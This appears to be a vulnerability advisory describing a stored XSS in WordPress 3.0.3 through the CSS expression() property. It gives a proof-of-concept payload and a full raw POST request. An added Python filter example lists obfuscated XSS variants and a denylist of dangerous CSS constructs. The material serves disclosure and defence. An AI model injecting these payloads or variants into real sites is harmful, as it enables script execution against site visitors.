
Wordpress 3.0.3 Stored XSS


Software: wordpress.org

Version: 3.0.3

Affected browsers: IE 7, IE 6, NS 8.1

Author: Saif

Stored XSS in post content via a CSS style attribute. The payload uses the expression() dynamic property, which only Internet Explorer's CSS engine evaluates (Netscape 8.1 can render with that engine, which is why it is listed), so the script runs whenever the saved post is viewed in one of the affected browsers; other browsers ignore the property. A caveat when assessing impact: WordPress lets users with the unfiltered_html capability (Administrators and Editors on a single-site install) save arbitrary HTML by design, so the finding only matters if the posting account is one whose content goes through KSES filtering, and the advisory does not say which role was used.

PoC: publish a post whose content contains "<IMG STYLE="xss:expression(alert('XSS'))">"

Alternatively, send the raw request below yourself and place the payload in the content parameter:


POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99; wp-settings-time-1=1293196695; wp-settings-time-2=1293197912; wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do; wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48; PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37; kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd; AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655

_wpnonce=aad1243dc1&_wp_http_referer=/wordpress/wp-admin/post.php?post=145&action=edit&message=1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&_wp_original_http_referer=http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category[]=0&post_category[]=1&tax_input[post_tag]=&newtag[post_tag]=&post_title=&samplepermalinknonce=ffcbf222eb&content=<IMG+STYLE="xss:expression(alert('XSS'))">&excerpt=&trackback_url=&meta[108][key]=_edit_last&_ajax_nonce=257f6f6ad9&meta[108][value]=3&meta[111][key]=_edit_lock&_ajax_nonce=257f6f6ad9&meta[111][value]=1293465765&meta[116][key]=_encloseme&_ajax_nonce=257f6f6ad9&meta[116][value]=1&meta[110][key]=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta[110][value]=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145
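As an added example (not part of the original advisory and not WordPress code), the following Python shows why a filter that merely looks for the literal string "expression(" in a style attribute is not enough: it catches the advisory's payload but misses lightly obfuscated variants, which a checker that first normalises the CSS the way a browser's parser would (decoding HTML entities, stripping comments, resolving CSS escapes, collapsing whitespace and case) does catch. Every sample tag except the advisory's own payload is constructed for this demonstration.

```python
# Added example, not code from the advisory or from WordPress: a small
# style-attribute checker contrasting a literal blocklist with a normalising
# one. All sample tags are constructed here except the advisory's payload.
import html
import re

SAMPLES = {
    # the advisory's payload, verbatim
    "advisory": '<IMG STYLE="xss:expression(alert(\'XSS\'))">',
    # constructed: defeats a case-sensitive substring check
    "mixed_case": '<img style="xss:ExPreSSion(alert(1))">',
    # constructed: CSS comments are ignored by the parser, so they split the keyword
    "css_comment": '<img style="xss:expr/**/ession(alert(1))">',
    # constructed: CSS hex escape "\72 " decodes to "r" (the space ends the escape)
    "css_escape": '<img style="xss:exp\\72 ession(alert(1))">',
    # constructed: the HTML entity for "(" is decoded before the CSS is parsed
    "entity": '<img style="xss:expression&#40;alert(1))">',
    # constructed: harmless styling that a filter must let through
    "benign": '<img style="width: 10px; border: 1px solid #000">',
}

STYLE_ATTR = re.compile(r'style\s*=\s*(["\'])(.*?)\1', re.I | re.S)


def extract_style(tag: str) -> str:
    """Return the raw value of the style attribute, or '' if there is none."""
    m = STYLE_ATTR.search(tag)
    return m.group(2) if m else ""


def naive_is_dangerous(style: str) -> bool:
    """Literal substring check: catches the advisory payload and little else."""
    return "expression(" in style


def normalize_css(style: str) -> str:
    """Undo the decoding steps a browser performs before its CSS parser runs."""
    s = html.unescape(style)                                 # &#40; -> (
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)              # drop /* */ comments
    s = re.sub(r"\\([0-9a-fA-F]{1,6})\s?",                   # \72  -> r
               lambda m: chr(min(int(m.group(1), 16), 0x10FFFF)), s)
    s = re.sub(r"\\(.)", r"\1", s)                           # \r -> r
    s = re.sub(r"\s+", "", s)                                # collapse whitespace
    return s.lower()


# Conservative denylist of CSS constructs that can run script or pull in
# attacker-controlled content in legacy engines. url( is included on purpose,
# so background images are blocked too; that is the usual trade-off when
# accepting user-supplied style attributes at all.
DANGEROUS = re.compile(r"expression|javascript:|vbscript:|-moz-binding|behavior:|url\(")


def hardened_is_dangerous(style: str) -> bool:
    """Match the denylist against the normalised form, not the raw attribute."""
    return bool(DANGEROUS.search(normalize_css(style)))


def evaluate(check) -> dict:
    """Run one checker over every sample tag and report which ones it flags."""
    return {name: check(extract_style(tag)) for name, tag in SAMPLES.items()}


if __name__ == "__main__":
    for label, check in (("naive", naive_is_dangerous),
                         ("hardened", hardened_is_dangerous)):
        print(label, evaluate(check))
```

Running it shows the naive check flagging only the advisory's exact payload while the normalising check flags all five malicious variants and passes the benign one. The safest server-side policy remains to drop style attributes from untrusted content entirely, or to allow only an explicit list of properties and values; the denylist here exists to make the normalisation step visible, not to be copied as a complete filter.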